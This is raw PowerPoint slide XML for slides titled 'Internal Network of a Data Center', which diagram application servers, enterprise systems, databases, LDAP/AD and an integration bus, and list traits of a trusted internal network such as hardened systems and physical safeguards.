    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110222508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dirty="0" smtClean="0"/>
              <a:t>Internal Network of a Data Center</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="3505200" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What are the characteristics of an Internal Network (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BlueNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GreenNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Trusted Network)?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="914400"/>
            <a:ext cx="4419600" cy="5486400"/>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44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="2590800"/>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45" name="Flowchart: Terminator 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="24399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AS2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="2590799"/>
            <a:ext cx="381000" cy="1"/>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47" name="Flowchart: Terminator 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5103876" y="2439926"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="5791198"/>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49" name="Flowchart: Terminator 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="5640323"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="5791197"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Flowchart: Terminator 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5103876" y="5640324"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Straight Arrow Connector 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4194048" y="4724400"/>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53" name="Flowchart: Terminator 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4421124" y="45735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AS4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Arrow Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="4724399"/>
            <a:ext cx="381000" cy="1"/>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
        <p:nvSpPr>
          <p:cNvPr id="55" name="Flowchart: Terminator 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5106924" y="4573526"/>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ERP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="Straight Arrow Connector 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="1523999"/>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57" name="Flowchart: Terminator 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="1373124"/>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AS1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Arrow Connector 57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="1523998"/>
            <a:ext cx="381000" cy="1"/>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59" name="Flowchart: Terminator 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5103876" y="13731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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60" name="Straight Arrow Connector 59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="3657600"/>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61" name="Flowchart: Terminator 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="35067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AS3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62" name="Straight Arrow Connector 61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="3657599"/>
            <a:ext cx="381000" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Flowchart: Terminator 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5219700" y="3390902"/>
            <a:ext cx="914400" cy="533400"/>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MS SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Can 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1828800"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Can 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7551019" y="2499362"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Can 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7551019" y="1159843"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Can 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="3185160"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Can 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1066800"/>
            <a:ext cx="914400" cy="838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LDAP/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Can 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="3886200"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Left-Right Arrow Callout 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6099048" y="2089404"/>
            <a:ext cx="1216152" cy="4158996"/>
          </a:xfrm>
          <a:prstGeom prst="lef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EAI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Can 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="4577715"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="958871347"/>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marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223360563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dirty="0" smtClean="0"/>
              <a:t>Internal Network of a Data Center</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="914400"/>
            <a:ext cx="3962400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What are the characteristics of an Internal Network (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BlueNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GreenNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Trusted Network)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connectivity Freedom (within the trusted network)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Increased Physical Safe guards </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardened Systems at the OS level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shared Services and Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="914400"/>
            <a:ext cx="4419600" cy="5486400"/>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44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="2590800"/>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45" name="Flowchart: Terminator 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="24399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AS2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="2590799"/>
            <a:ext cx="381000" cy="1"/>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47" name="Flowchart: Terminator 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5103876" y="2439926"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="5791198"/>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49" name="Flowchart: Terminator 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="5640323"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="5791197"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Flowchart: Terminator 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5103876" y="5640324"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Straight Arrow Connector 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4194048" y="4724400"/>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53" name="Flowchart: Terminator 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4421124" y="45735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AS4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Arrow Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="4724399"/>
            <a:ext cx="381000" cy="1"/>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
        <p:nvSpPr>
          <p:cNvPr id="55" name="Flowchart: Terminator 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5106924" y="4573526"/>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ERP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="Straight Arrow Connector 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="1523999"/>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57" name="Flowchart: Terminator 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="1373124"/>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AS1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Arrow Connector 57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="1523998"/>
            <a:ext cx="381000" cy="1"/>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59" name="Flowchart: Terminator 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5103876" y="13731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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60" name="Straight Arrow Connector 59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4191000" y="3657600"/>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61" name="Flowchart: Terminator 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4418076" y="35067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AS3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62" name="Straight Arrow Connector 61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026152" y="3657599"/>
            <a:ext cx="381000" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Flowchart: Terminator 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5219700" y="3390902"/>
            <a:ext cx="914400" cy="533400"/>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MS SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Can 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7688981" y="1828800"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Can 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="2499362"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Can 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="1159843"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Can 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7688981" y="3185160"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Can 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1066800"/>
            <a:ext cx="914400" cy="838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LDAP/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Can 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7688981" y="3886200"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Left-Right Arrow Callout 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6099048" y="2089404"/>
            <a:ext cx="1216152" cy="4158996"/>
          </a:xfrm>
          <a:prstGeom prst="lef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EAI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Can 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7688981" y="4572000"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="59" idx="3"/>
            <a:endCxn id="68" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5561076" y="1066801"/>
            <a:ext cx="687324" cy="419099"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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47" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5561076" y="1504950"/>
            <a:ext cx="687324" cy="628652"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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63" idx="3"/>
            <a:endCxn id="68" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5676900" y="1485900"/>
            <a:ext cx="571500" cy="1714502"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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55" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5564124" y="1524001"/>
            <a:ext cx="684276" cy="2743201"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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51" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5561076" y="1524001"/>
            <a:ext cx="687324" cy="3809999"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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70" idx="1"/>
            <a:endCxn id="59" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5711952" y="1524001"/>
            <a:ext cx="387096" cy="264490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70" idx="1"/>
            <a:endCxn id="47" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5711952" y="2590802"/>
            <a:ext cx="387096" cy="15781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endCxn id="63" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5943600" y="3657602"/>
            <a:ext cx="155448" cy="45719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70" idx="1"/>
            <a:endCxn id="55" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5715000" y="4168902"/>
            <a:ext cx="384048" cy="5555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70" idx="1"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5711952" y="4168902"/>
